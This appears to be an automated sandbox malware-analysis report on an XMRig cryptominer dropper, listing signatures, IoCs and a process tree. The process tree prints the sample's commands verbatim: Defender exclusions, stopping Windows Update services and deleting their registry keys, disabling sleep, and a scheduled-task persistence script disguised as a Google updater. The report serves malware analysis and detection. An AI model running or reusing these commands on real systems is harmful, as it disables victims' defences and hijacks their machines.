xmrig | 305fb7b5adde837bdadd1cae12c836afd054ce08d92cc45e4d31849c85cd7e77

Analysis

max time kernel
306s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
03-10-2022 04:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

555.exe
Size

7.1MB
MD5

1811298c479bc582f551f733c4c11f7d
SHA1

78d2b2c8f2a7c4cd4019cbdf356cafa928cadc9f
SHA256

305fb7b5adde837bdadd1cae12c836afd054ce08d92cc45e4d31849c85cd7e77
SHA512

986f7cfe4f82ce8a8225e44c2fe7c1f9c23dd6536d28b16cc882c5eec2757b3bca0a12892b7e834b9d27757cd41d69aef42696a8ea3eb21dc4ff53a2b60d842f
SSDEEP

196608:iqFm0FXrzx4rtPVbFxPXQha2j+VE7fVhoKqeGb5K/5zU:iairpp7CanVE7T9TEE5zU

Score

10^/10

xmrig evasion miner themida trojan upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

updater.exe555.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 555.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	555.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1996-227-0x00007FF6BDA50000-0x00007FF6BE244000-memory.dmp	xmrig
behavioral2/memory/1996-230-0x00007FF6BDA50000-0x00007FF6BE244000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

555.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts 555.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

4204 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	555.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

pid	process
4204	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/1996-227-0x00007FF6BDA50000-0x00007FF6BE244000-memory.dmp	upx
behavioral2/memory/1996-230-0x00007FF6BDA50000-0x00007FF6BE244000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

updater.exe555.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	555.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	555.exe

Themida packer 19 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/3068-132-0x00007FF634C40000-0x00007FF635940000-memory.dmp	themida
behavioral2/memory/3068-133-0x00007FF634C40000-0x00007FF635940000-memory.dmp	themida
behavioral2/memory/3068-134-0x00007FF634C40000-0x00007FF635940000-memory.dmp	themida
behavioral2/memory/3068-136-0x00007FF634C40000-0x00007FF635940000-memory.dmp	themida
behavioral2/memory/3068-137-0x00007FF634C40000-0x00007FF635940000-memory.dmp	themida
behavioral2/memory/3068-138-0x00007FF634C40000-0x00007FF635940000-memory.dmp	themida
behavioral2/memory/3068-139-0x00007FF634C40000-0x00007FF635940000-memory.dmp	themida
behavioral2/memory/3068-140-0x00007FF634C40000-0x00007FF635940000-memory.dmp	themida
behavioral2/memory/3068-168-0x00007FF634C40000-0x00007FF635940000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/4204-175-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp	themida
behavioral2/memory/4204-177-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp	themida
behavioral2/memory/4204-178-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp	themida
behavioral2/memory/4204-179-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp	themida
behavioral2/memory/4204-180-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp	themida
behavioral2/memory/4204-181-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp	themida
behavioral2/memory/4204-183-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp	themida
behavioral2/memory/4204-226-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

updater.exe555.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	555.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

555.exeupdater.exe

pid process

3068 555.exe
4204 updater.exe

pid	process
3068	555.exe
4204	updater.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 4204 set thread context of 4848	4204	updater.exe	conhost.exe
PID 4204 set thread context of 1996	4204	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

555.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	555.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1200 sc.exe
4988 sc.exe
2880 sc.exe
3148 sc.exe
4620 sc.exe
4868 sc.exe
204 sc.exe
1008 sc.exe
1040 sc.exe
540 sc.exe
4540 sc.exe

pid	process
1200	sc.exe
4988	sc.exe
2880	sc.exe
3148	sc.exe
4620	sc.exe
4868	sc.exe
204	sc.exe
1008	sc.exe
1040	sc.exe
540	sc.exe
4540	sc.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exe

pid	process
4052	powershell.exe
4052	powershell.exe
3092	powershell.exe
3092	powershell.exe
4408	powershell.exe
4408	powershell.exe
852	powershell.exe
852	powershell.exe
1808	powershell.exe
1808	powershell.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe
1996	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

660

pid	process
660

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeShutdownPrivilege	2344	powercfg.exe
Token: SeCreatePagefilePrivilege	2344	powercfg.exe
Token: SeShutdownPrivilege	2236	powercfg.exe
Token: SeCreatePagefilePrivilege	2236	powercfg.exe
Token: SeShutdownPrivilege	2216	powercfg.exe
Token: SeCreatePagefilePrivilege	2216	powercfg.exe
Token: SeShutdownPrivilege	1880	powercfg.exe
Token: SeCreatePagefilePrivilege	1880	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3092	powershell.exe
Token: SeSecurityPrivilege	3092	powershell.exe
Token: SeTakeOwnershipPrivilege	3092	powershell.exe
Token: SeLoadDriverPrivilege	3092	powershell.exe
Token: SeSystemProfilePrivilege	3092	powershell.exe
Token: SeSystemtimePrivilege	3092	powershell.exe
Token: SeProfSingleProcessPrivilege	3092	powershell.exe
Token: SeIncBasePriorityPrivilege	3092	powershell.exe
Token: SeCreatePagefilePrivilege	3092	powershell.exe
Token: SeBackupPrivilege	3092	powershell.exe
Token: SeRestorePrivilege	3092	powershell.exe
Token: SeShutdownPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeSystemEnvironmentPrivilege	3092	powershell.exe
Token: SeRemoteShutdownPrivilege	3092	powershell.exe
Token: SeUndockPrivilege	3092	powershell.exe
Token: SeManageVolumePrivilege	3092	powershell.exe
Token: 33	3092	powershell.exe
Token: 34	3092	powershell.exe
Token: 35	3092	powershell.exe
Token: 36	3092	powershell.exe
Token: SeIncreaseQuotaPrivilege	3092	powershell.exe
Token: SeSecurityPrivilege	3092	powershell.exe
Token: SeTakeOwnershipPrivilege	3092	powershell.exe
Token: SeLoadDriverPrivilege	3092	powershell.exe
Token: SeSystemProfilePrivilege	3092	powershell.exe
Token: SeSystemtimePrivilege	3092	powershell.exe
Token: SeProfSingleProcessPrivilege	3092	powershell.exe
Token: SeIncBasePriorityPrivilege	3092	powershell.exe
Token: SeCreatePagefilePrivilege	3092	powershell.exe
Token: SeBackupPrivilege	3092	powershell.exe
Token: SeRestorePrivilege	3092	powershell.exe
Token: SeShutdownPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeSystemEnvironmentPrivilege	3092	powershell.exe
Token: SeRemoteShutdownPrivilege	3092	powershell.exe
Token: SeUndockPrivilege	3092	powershell.exe
Token: SeManageVolumePrivilege	3092	powershell.exe
Token: 33	3092	powershell.exe
Token: 34	3092	powershell.exe
Token: 35	3092	powershell.exe
Token: 36	3092	powershell.exe
Token: SeIncreaseQuotaPrivilege	3092	powershell.exe
Token: SeSecurityPrivilege	3092	powershell.exe
Token: SeTakeOwnershipPrivilege	3092	powershell.exe
Token: SeLoadDriverPrivilege	3092	powershell.exe
Token: SeSystemProfilePrivilege	3092	powershell.exe
Token: SeSystemtimePrivilege	3092	powershell.exe
Token: SeProfSingleProcessPrivilege	3092	powershell.exe
Token: SeIncBasePriorityPrivilege	3092	powershell.exe
Token: SeCreatePagefilePrivilege	3092	powershell.exe
Token: SeBackupPrivilege	3092	powershell.exe
Token: SeRestorePrivilege	3092	powershell.exe
Token: SeShutdownPrivilege	3092	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

555.execmd.execmd.exepowershell.exeupdater.execmd.execmd.exe

description	pid	process	target process
PID 3068 wrote to memory of 4052	3068	555.exe	powershell.exe
PID 3068 wrote to memory of 4052	3068	555.exe	powershell.exe
PID 3068 wrote to memory of 4044	3068	555.exe	cmd.exe
PID 3068 wrote to memory of 4044	3068	555.exe	cmd.exe
PID 3068 wrote to memory of 4532	3068	555.exe	cmd.exe
PID 3068 wrote to memory of 4532	3068	555.exe	cmd.exe
PID 3068 wrote to memory of 3092	3068	555.exe	powershell.exe
PID 3068 wrote to memory of 3092	3068	555.exe	powershell.exe
PID 4044 wrote to memory of 4988	4044	cmd.exe	sc.exe
PID 4044 wrote to memory of 4988	4044	cmd.exe	sc.exe
PID 4532 wrote to memory of 2344	4532	cmd.exe	powercfg.exe
PID 4532 wrote to memory of 2344	4532	cmd.exe	powercfg.exe
PID 4044 wrote to memory of 1008	4044	cmd.exe	sc.exe
PID 4044 wrote to memory of 1008	4044	cmd.exe	sc.exe
PID 4532 wrote to memory of 2236	4532	cmd.exe	powercfg.exe
PID 4532 wrote to memory of 2236	4532	cmd.exe	powercfg.exe
PID 4044 wrote to memory of 1040	4044	cmd.exe	sc.exe
PID 4044 wrote to memory of 1040	4044	cmd.exe	sc.exe
PID 4532 wrote to memory of 2216	4532	cmd.exe	powercfg.exe
PID 4532 wrote to memory of 2216	4532	cmd.exe	powercfg.exe
PID 4044 wrote to memory of 2880	4044	cmd.exe	sc.exe
PID 4044 wrote to memory of 2880	4044	cmd.exe	sc.exe
PID 4532 wrote to memory of 1880	4532	cmd.exe	powercfg.exe
PID 4532 wrote to memory of 1880	4532	cmd.exe	powercfg.exe
PID 4044 wrote to memory of 3148	4044	cmd.exe	sc.exe
PID 4044 wrote to memory of 3148	4044	cmd.exe	sc.exe
PID 4044 wrote to memory of 5044	4044	cmd.exe	reg.exe
PID 4044 wrote to memory of 5044	4044	cmd.exe	reg.exe
PID 4044 wrote to memory of 4716	4044	cmd.exe	reg.exe
PID 4044 wrote to memory of 4716	4044	cmd.exe	reg.exe
PID 4044 wrote to memory of 3780	4044	cmd.exe	reg.exe
PID 4044 wrote to memory of 3780	4044	cmd.exe	reg.exe
PID 4044 wrote to memory of 4664	4044	cmd.exe	reg.exe
PID 4044 wrote to memory of 4664	4044	cmd.exe	reg.exe
PID 4044 wrote to memory of 4100	4044	cmd.exe	reg.exe
PID 4044 wrote to memory of 4100	4044	cmd.exe	reg.exe
PID 3068 wrote to memory of 4408	3068	555.exe	powershell.exe
PID 3068 wrote to memory of 4408	3068	555.exe	powershell.exe
PID 4408 wrote to memory of 1684	4408	powershell.exe	schtasks.exe
PID 4408 wrote to memory of 1684	4408	powershell.exe	schtasks.exe
PID 4204 wrote to memory of 852	4204	updater.exe	powershell.exe
PID 4204 wrote to memory of 852	4204	updater.exe	powershell.exe
PID 4204 wrote to memory of 2376	4204	updater.exe	cmd.exe
PID 4204 wrote to memory of 2376	4204	updater.exe	cmd.exe
PID 4204 wrote to memory of 3680	4204	updater.exe	cmd.exe
PID 4204 wrote to memory of 3680	4204	updater.exe	cmd.exe
PID 4204 wrote to memory of 1808	4204	updater.exe	powershell.exe
PID 4204 wrote to memory of 1808	4204	updater.exe	powershell.exe
PID 2376 wrote to memory of 4620	2376	cmd.exe	sc.exe
PID 2376 wrote to memory of 4620	2376	cmd.exe	sc.exe
PID 3680 wrote to memory of 3208	3680	cmd.exe	powercfg.exe
PID 3680 wrote to memory of 3208	3680	cmd.exe	powercfg.exe
PID 2376 wrote to memory of 4868	2376	cmd.exe	sc.exe
PID 2376 wrote to memory of 4868	2376	cmd.exe	sc.exe
PID 3680 wrote to memory of 2524	3680	cmd.exe	powercfg.exe
PID 3680 wrote to memory of 2524	3680	cmd.exe	powercfg.exe
PID 2376 wrote to memory of 540	2376	cmd.exe	sc.exe
PID 2376 wrote to memory of 540	2376	cmd.exe	sc.exe
PID 3680 wrote to memory of 2348	3680	cmd.exe	powercfg.exe
PID 3680 wrote to memory of 2348	3680	cmd.exe	powercfg.exe
PID 2376 wrote to memory of 204	2376	cmd.exe	sc.exe
PID 2376 wrote to memory of 204	2376	cmd.exe	sc.exe
PID 3680 wrote to memory of 228	3680	cmd.exe	powercfg.exe
PID 3680 wrote to memory of 228	3680	cmd.exe	powercfg.exe

C:\Users\Admin\AppData\Local\Temp\555.exe
"C:\Users\Admin\AppData\Local\Temp\555.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4044

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4988

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1008

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1040

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2880

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3148

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:5044

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4716

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:3780

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4664

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4100

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:4532

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#eaoqkxx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
